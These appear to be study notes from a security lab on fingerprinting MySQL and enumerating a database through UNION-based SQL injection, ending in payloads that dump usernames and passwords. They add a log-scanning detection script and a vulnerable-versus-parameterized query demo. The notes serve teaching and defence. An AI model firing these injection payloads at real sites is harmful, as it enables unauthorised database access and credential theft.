- Before enumerating the database, we usually need to identify the type of DBMS we are dealing with
- This is because each DBMS has different queries, and knowing what it is will help us know what queries to use
- Initial educated guess:
    - If the webserver we see in HTTP responses is `Apache` or `Nginx`, it is a good guess that the webserver is running on Linux, so the DBMS is likely `MySQL`
    - The same logic applies for Microsoft: if the webserver is `IIS`, the DBMS is likely `MSSQL`
# MySQL Fingerprinting
- The following queries and their output will tell us that we are dealing with `MySQL`:
|Payload|When to Use|Expected Output|Wrong Output|
|---|---|---|---|
|`SELECT @@version`|When we have full query output|MySQL version, e.g. `10.3.22-MariaDB-1ubuntu1`|In MSSQL it returns the MSSQL version. Error with other DBMS.|
|`SELECT POW(1,1)`|When we only have numeric output|`1`|Error with other DBMS|
|`SELECT SLEEP(5)`|Blind/No Output|Delays page response for 5 seconds and returns `0`.|Will not delay response with other DBMS|
## Schemata
- The table [SCHEMATA](https://dev.mysql.com/doc/refman/8.0/en/information-schema-schemata-table.html) in the `INFORMATION_SCHEMA` database contains information about all databases on the server
- This is used to obtain database names so we can then query them
- The `SCHEMA_NAME` column contains all the database names currently present
```mysql
mysql> SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;
+--------------------+
| SCHEMA_NAME        |
+--------------------+
| mysql              |
| information_schema |
| performance_schema |
| ilfreight          |
| dev                |
+--------------------+
6 rows in set (0.01 sec)
```
- NOTE: The first three databases above are default MySQL databases and are present on any server, so we usually ignore them during DB enumeration
- Sometimes there's a fourth `sys` DB as well
- We can use a `UNION` injection and the below payload to enumerate db names
```mysql
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -
```
![[images/Pasted image 20251204143343.png]]
- Now we can determine which database the web app uses to retrieve the ports data
- We can find the current db with the below payload, which uses the `database()` function in the query
```mysql
cn' UNION select 1,database(),2,3-- -
```
![[images/Pasted image 20251204143458.png]]
## TABLES
- Before we dump data from the `dev` database, we need to get a list of the tables to query them with a `SELECT` statement
- To find all tables within a database, we can use the `TABLES` table in the `INFORMATION_SCHEMA` db
- The [TABLES](https://dev.mysql.com/doc/refman/8.0/en/information-schema-tables-table.html) table contains information about all tables across all databases on the server
- This table contains multiple columns, but we are interested in the `TABLE_SCHEMA` and `TABLE_NAME` columns
- The `TABLE_NAME` column stores table names, while the `TABLE_SCHEMA` column points to the database each table belongs to
- We can use a `UNION` injection and the below payload to enumerate table names for the `dev` db
```mysql
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -
```
![[images/Pasted image 20251204143650.png]]
## COLUMNS
- The [COLUMNS](https://dev.mysql.com/doc/refman/8.0/en/information-schema-columns-table.html) table contains information about all columns present in all the databases
- This helps us find the column names to query a table for
- The `COLUMN_NAME`, `TABLE_NAME`, and `TABLE_SCHEMA` columns can be used to achieve this
- We can use a `UNION` injection and the below payload to enumerate column names for the `credentials` table
```mysql
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -
```
![[images/Pasted image 20251204143826.png]]
## DATA
- After enumerating the dbs and tables, we can form our `UNION` query to dump data of the `username` and `password` columns from the `credentials` table in the `dev` database
- See the below payload
- NOTE: Do NOT forget to use the dot operator to refer to the `credentials` table in the `dev` database, as the web app is running in the `ilfreight` db, as previously discussed
```mysql
cn' UNION select 1, username, password, 4 from dev.credentials-- -
```
![[images/Pasted image 20251204144006.png]]
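From the defender's side, the fingerprinting payloads in the table above and the four-stage enumeration chain (`SCHEMATA` > `TABLES` > `COLUMNS` > data) leave a very recognisable trail in web server access logs. The following script is an added example, not part of the original notes or the lab it describes: it replays the chain from this page as constructed Apache/Nginx-style log lines against a hypothetical `/search.php?port_code=` endpoint (both names are assumptions), URL-decodes each request parameter twice to collapse double encoding, and labels each hit with the enumeration stage it belongs to, so that one client walking the whole chain stands out.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (combined log format) replaying the enumeration
# chain from the notes against a hypothetical /search.php endpoint. Neither the
# endpoint nor the parameter name comes from the original page.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Dec/2025:14:30:01 +0000] "GET /search.php?port_code=cn HTTP/1.1" 200 2210
203.0.113.5 - - [04/Dec/2025:14:31:12 +0000] "GET /search.php?port_code=cn%27+UNION+select+1%2C%40%40version%2C3%2C4--+- HTTP/1.1" 200 2250
203.0.113.5 - - [04/Dec/2025:14:33:43 +0000] "GET /search.php?port_code=cn%27+UNION+select+1%2Cschema_name%2C3%2C4+from+INFORMATION_SCHEMA.SCHEMATA--+- HTTP/1.1" 200 2410
203.0.113.5 - - [04/Dec/2025:14:34:58 +0000] "GET /search.php?port_code=cn%27+UNION+select+1%2Cdatabase%28%29%2C2%2C3--+- HTTP/1.1" 200 2230
203.0.113.5 - - [04/Dec/2025:14:36:50 +0000] "GET /search.php?port_code=cn%27+UNION+select+1%2CTABLE_NAME%2CTABLE_SCHEMA%2C4+from+INFORMATION_SCHEMA.TABLES+where+table_schema%3D%27dev%27--+- HTTP/1.1" 200 2380
203.0.113.5 - - [04/Dec/2025:14:38:26 +0000] "GET /search.php?port_code=cn%27+UNION+select+1%2CCOLUMN_NAME%2CTABLE_NAME%2CTABLE_SCHEMA+from+INFORMATION_SCHEMA.COLUMNS+where+table_name%3D%27credentials%27--+- HTTP/1.1" 200 2390
203.0.113.5 - - [04/Dec/2025:14:40:06 +0000] "GET /search.php?port_code=cn%27+UNION+select+1%2C+username%2C+password%2C+4+from+dev.credentials--+- HTTP/1.1" 200 2300
198.51.100.7 - - [04/Dec/2025:14:41:00 +0000] "GET /index.php HTTP/1.1" 200 1800
"""

# Combined log format: client IP, identity, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Ordered most-specific first; the first matching rule names the enumeration stage.
STAGE_RULES = [
    ("schemata",    re.compile(r"information_schema\s*\.\s*schemata", re.I)),
    ("tables",      re.compile(r"information_schema\s*\.\s*tables", re.I)),
    ("columns",     re.compile(r"information_schema\s*\.\s*columns", re.I)),
    ("current_db",  re.compile(r"\bdatabase\s*\(\s*\)", re.I)),
    ("fingerprint", re.compile(r"@@version|\bpow\s*\(|\bsleep\s*\(", re.I)),
    ("data",        re.compile(r"\bunion\b[\s/*]+(all\s+)?select\b", re.I)),
]


def normalize(value: str) -> str:
    """Decode twice so double URL encoding cannot hide keywords, then squeeze whitespace."""
    decoded = unquote_plus(unquote_plus(value))
    return re.sub(r"\s+", " ", decoded)


def classify(value: str):
    """Return the enumeration stage a raw parameter value belongs to, or None."""
    text = normalize(value)
    for stage, rule in STAGE_RULES:
        if rule.search(text):
            return stage
    return None


def scan(log_text: str) -> list:
    """Return (ip, parameter, stage) for every query parameter that matches a rule."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # Split the raw query ourselves so the value is still undecoded when normalize() runs
        query = urlsplit(m.group("target")).query
        for pair in query.split("&"):
            if not pair:
                continue
            name, _, value = pair.partition("=")
            stage = classify(value)
            if stage:
                hits.append((m.group("ip"), name, stage))
    return hits


def chains(hits) -> dict:
    """Group stages per client IP in request order, so a full enumeration chain is visible."""
    per_ip = {}
    for ip, _, stage in hits:
        per_ip.setdefault(ip, []).append(stage)
    return per_ip


if __name__ == "__main__":
    for ip, stages in chains(scan(SAMPLE_LOG)).items():
        print(ip, "->", " > ".join(stages))
```

Run stand-alone it prints one line per client with the stage sequence; on the constructed log that is `203.0.113.5 -> fingerprint > schemata > current_db > tables > columns > data`. The stage labels are the useful part: a single `UNION select` hit is noise on many sites, but an `INFORMATION_SCHEMA.SCHEMATA` hit followed within minutes by `TABLES`, `COLUMNS` and a cross-schema read from the same address is the exact sequence these notes walk through.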
# Exercise
- Enumerate dbs with the payload below
```mysql
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -
```
![[images/Pasted image 20251204144917.png]]
- Enumerate tables within the `ilfreight` db with the payload below
```mysql
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='ilfreight'-- -
```
![[images/Pasted image 20251204144939.png]]
- Enumerate columns within the `users` table with the payload below
```mysql
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='users'-- -
```
![[images/Pasted image 20251204145039.png]]
- Pull data from the `ilfreight.users` table with the payload below
```mysql
cn' UNION select 1, username, password, 4 from ilfreight.users-- -
```
![[images/Pasted image 20251204145135.png]]
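Every payload on this page works for the same reason: the search term is concatenated into the SQL text, so the `'` closes the literal and the `UNION` becomes part of the statement. The following is an added example, not code from the original notes or the lab application: it models the ports search with an in-memory SQLite database (SQLite is a stand-in chosen so the block runs offline; the `ports` columns, the `dev.credentials` rows and the `LIKE '%term%'` query shape are all constructed assumptions) and runs the page's final data-dump payload through a vulnerable string-formatted query and through a parameterized one, to show that the bound parameter turns the whole payload into an ordinary search pattern.

```python
import sqlite3

# The data-dump payload from the notes, used as the search term in both versions.
PAYLOAD = "cn' UNION select 1, username, password, 4 from dev.credentials-- -"


def build_db() -> sqlite3.Connection:
    """Constructed stand-in: a 4-column ports table in the app's schema plus a
    separate 'dev' schema holding a credentials table, as in the notes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("ATTACH DATABASE ':memory:' AS dev")
    conn.execute("CREATE TABLE ports (code TEXT, city TEXT, volume INTEGER, country TEXT)")
    conn.executemany(
        "INSERT INTO ports VALUES (?, ?, ?, ?)",
        [("CN SHA", "Shanghai", 43303, "China"), ("US LAX", "Los Angeles", 9337, "USA")],
    )
    conn.execute("CREATE TABLE dev.credentials (username TEXT, password TEXT)")
    conn.execute("INSERT INTO dev.credentials VALUES ('admin', 'constructed-secret')")
    return conn


def search_ports_vulnerable(conn: sqlite3.Connection, term: str) -> list:
    """The pattern the notes exploit: user input pasted into the SQL text.
    The quote in the payload ends the literal, the UNION appends a second
    SELECT, and '-- ' comments out the rest of the original query."""
    sql = f"SELECT code, city, volume, country FROM ports WHERE code LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def search_ports_hardened(conn: sqlite3.Connection, term: str) -> list:
    """Bound parameter: the input is sent separately from the statement, so it
    can only ever be a LIKE pattern, never SQL. Same idea with MySQL drivers."""
    sql = "SELECT code, city, volume, country FROM ports WHERE code LIKE ?"
    return conn.execute(sql, ("%" + term + "%",)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, normal input:", search_ports_vulnerable(db, "cn"))
    print("vulnerable, payload:     ", search_ports_vulnerable(db, PAYLOAD))
    print("hardened, normal input:  ", search_ports_hardened(db, "cn"))
    print("hardened, payload:       ", search_ports_hardened(db, PAYLOAD))
```

The vulnerable version returns the `dev.credentials` row when given the payload, exactly as the notes show; the hardened version returns no rows, because no port code contains the payload as a literal substring. The second lesson from the notes' `dev.credentials` read is about privilege, not syntax: the application account in this lab can `SELECT` from a schema the application never uses, so even with injection present, a database account granted only the privileges it needs on its own schema would not have exposed `dev`.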